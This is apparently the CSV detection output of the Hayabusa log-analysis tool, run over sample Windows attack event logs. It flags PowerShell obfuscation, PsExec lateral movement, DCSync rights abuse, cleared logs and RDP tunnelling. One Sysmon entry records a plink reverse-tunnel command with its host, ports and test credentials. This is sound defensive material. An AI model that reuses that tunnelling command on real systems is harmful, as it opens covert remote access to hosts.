+2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Suspicious PowerShell Invocations - Specific,,rules/sigma/powershell/powershell_script/powershell_suspicious_invocation_specific_in_scripblocktext.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Keywords,,rules/sigma/powershell/powershell_script/powershell_malicious_keywords.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious Nishang PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:17:12.146 +09:00,SEC511,4104,high,Malicious PowerShell Commandlets,,rules/sigma/powershell/powershell_script/powershell_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 03:18:01.084 +09:00,SEC511,4104,medium,Windows PowerShell Web Request,,rules/sigma/powershell/powershell_script/powershell_web_request.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:12:28.360 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-31 04:15:23.660 +09:00,SEC511,4104,high,Accessing WinAPI in PowerShell,,rules/sigma/powershell/powershell_script/powershell_accessing_win_api.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-encoding-menu.evtx +2017-08-31 04:25:48.647 +09:00,SEC511,4104,high,Malicious Nishang PowerShell 
Commandlets,,rules/sigma/powershell/powershell_script/powershell_nishang_malicious_commandlets.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-string-menu.evtx +2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.350 +09:00,IEWIN7,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: blabla.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.540 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,Suspicious PsExec Execution,,rules/sigma/builtin/security/win_susp_psexec.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-19 22:00:10.711 +09:00,IEWIN7,5145,high,First Time Seen Remote Named Pipe,,rules/sigma/builtin/security/win_lm_namedpipe.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_renamed_psexecsvc_5145.evtx +2019-01-20 16:00:50.800 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_bloodhound.evtx +2019-01-20 16:29:57.863 +09:00,WIN-77LTAPHIQ1R.example.corp,1102,high,Security log was cleared,User: Administrator,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/discovery_psloggedon.evtx +2019-02-02 18:16:52.479 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: helpdesk : Workstation evil.internal.corp : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.562 +09:00,ICORP-DC.internal.corp,4776,informational,NTLM Logon to Local Account,User: EXCHANGE$ : Workstation EXCHANGE : Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:22.563 +09:00,ICORP-DC.internal.corp,4624,informational,Logon Type 3 - Network,User: EXCHANGE$ : Workstation: EXCHANGE : IP Address: 192.168.111.87 : Port: 58128 : LogonID: 
0x24daa6,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-02 18:17:27.629 +09:00,ICORP-DC.internal.corp,5136,critical,Powerview Add-DomainObjectAcl DCSync AD Extend Right,,rules/sigma/builtin/security/win_account_backdoor_dcsync_rights.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/privexchange_dirkjan.evtx +2019-02-14 00:15:04.175 +09:00,PC02.example.corp,4624,informational,Logon Type 0 - System,Bootup,rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:15:08.689 +09:00,PC02.example.corp,4624,low,Logon Type 5 - Service,User: sshd_server : Workstation: PC02 : IP Address: - : Port: - : LogonID: 0xe509,rules/hayabusa/default/events/Security/Logons/4624_LogonType-5-Service.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:19:51.259 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x21f73 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 49164 : LogonID: 0x45120 : (Warning: Credentials are stored in 
memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:26:53.356 +09:00,PC02.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:29:40.657 +09:00,PC02.example.corp,4624,informational,Logon Type 2 - Interactive,User: IEUser : Workstation: PC02 : IP Address: 127.0.0.1 : Port: 0 : LogonID: 0x4a26d : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:19.529 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49168 : LogonID: 0x73d02,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 00:31:31.556 +09:00,PC02.example.corp,4624,informational,Logon Type 3 - Network,User: ANONYMOUS LOGON : Workstation: PC01 : IP Address: 10.0.2.17 : Port: 49169 : LogonID: 0x7d4f4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunneling_4624.evtx +2019-02-14 03:01:41.593 +09:00,PC01.example.corp,1102,high,Security log was cleared,User: admin01,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4624,informational,Logon Type 11 - CachedInteractive,User: user01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 0 
: LogonID: 0x1414c8 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-11-CachedInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.426 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: user01 : IP Address: - : Process: C:\Windows\System32\lsass.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:02:04.526 +09:00,PC01.example.corp,4624,informational,Logon Type 7 - Unlock,User: user01 : Workstation: PC01 : IP Address: - : Port: - : LogonID: 0x1414d9,rules/hayabusa/default/events/Security/Logons/4624_LogonType-7-Unlock.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:01.632 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:43.171 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 
0x14871d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:45.905 +09:00,PC01.example.corp,5156,high,RDP over Reverse SSH Tunnel WFP,,rules/sigma/builtin/security/win_rdp_reverse_tunnel.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:57.442 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x148f5d,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,informational,Logon Type 10 - RDP (Remote Interactive),User: admin01 : Workstation: PC01 : IP Address: 127.0.0.1 : Port: 49274 : LogonID: 0x14a321 : (Warning: Credentials are stored in memory),rules/hayabusa/default/events/Security/Logons/4624_LogonType-10-RemoteInteractive.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4648,informational,Explicit Logon,Source User: PC01$ : Target User: admin01 : IP Address: 127.0.0.1 : Process: C:\Windows\System32\winlogon.exe : Target Server: localhost,rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4624,high,RDP Login from Localhost,,rules/sigma/builtin/security/win_rdp_localhost_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 
+09:00,PC01.example.corp,4624,low,Admin User Remote Logon,,rules/sigma/builtin/security/win_admin_rdp_login.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-14 03:04:58.363 +09:00,PC01.example.corp,4672,informational,Admin Logon,User: admin01 : LogonID: 0x14a321,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_RDP_Tunnel_5156.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: plink.exe 10.0.2.18 -P 80 -C -R 127.0.0.3:4444:127.0.0.2:3389 -l test -pw test : Path: C:\Users\IEUser\Desktop\plink.exe : User: PC01\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,high,Suspicious Plink Remote Forwarding,,rules/sigma/process_creation/sysmon_susp_plink_remote_forward.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:21.934 +09:00,PC01.example.corp,1,medium,Exfiltration and Tunneling Tools Execution,,rules/sigma/process_creation/win_exfiltration_and_tunneling_tools_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:02:48.502 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:03:48.058 +09:00,PC01.example.corp,1,informational,Process Creation,Command: UI0Detect.exe 224 : Path: C:\Windows\System32\UI0Detect.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\UI0Detect.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and 
Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.141 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.151 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.221 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.351 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,Command: \SystemRoot\System32\smss.exe 00000000 0000003c : Path: 
C:\Windows\System32\smss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.892 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 : Path: C:\Windows\System32\csrss.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:04.962 +09:00,PC01.example.corp,1,informational,Process Creation,Command: winlogon.exe : Path: C:\Windows\System32\winlogon.exe : User: NT AUTHORITY\SYSTEM : Parent Command: \SystemRoot\System32\smss.exe 00000000 0000003c ,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.092 +09:00,PC01.example.corp,3,high,Suspicious Outbound RDP Connections,,rules/sigma/network_connection/sysmon_susp_rdp.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.283 +09:00,PC01.example.corp,1,informational,Process Creation,"Command: ""LogonUI.exe"" /flags:0x0 : Path: C:\Windows\System32\LogonUI.exe : User: NT AUTHORITY\SYSTEM : Parent Command: winlogon.exe",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:04:05.563 +09:00,PC01.example.corp,1,informational,Process Creation,Command: 
C:\Windows\system32\TSTheme.exe -Embedding : Path: C:\Windows\System32\TSTheme.exe : User: PC01\IEUser : Parent Command: C:\Windows\system32\svchost.exe -k DcomLaunch,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:05:26.499 +09:00,PC01.example.corp,1,informational,Process Creation,Command: atbroker.exe : Path: C:\Windows\System32\AtBroker.exe : User: PC01\IEUser : Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-16 19:06:38.843 +09:00,PC01.example.corp,1,informational,Process Creation,Command: taskhost.exe $(Arg0) : Path: C:\Windows\System32\taskhost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: C:\Windows\system32\services.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Command and Control/DE_sysmon-3-rdp-tun.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:54:26.956 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 
10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:55:47.181 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 02:57:41.475 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\ADMIN$ : Share Path: \??\C:\Windows : File: System32\RemComSvc.exe : IP Address: 10.0.2.16,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: 
::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32\RemComSvc.exe : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral 
Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\System32 : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: IEUser : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows : IP Address: ::1,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_REMCOM_5145_TargetHost.evtx +2019-02-17 03:19:18.442 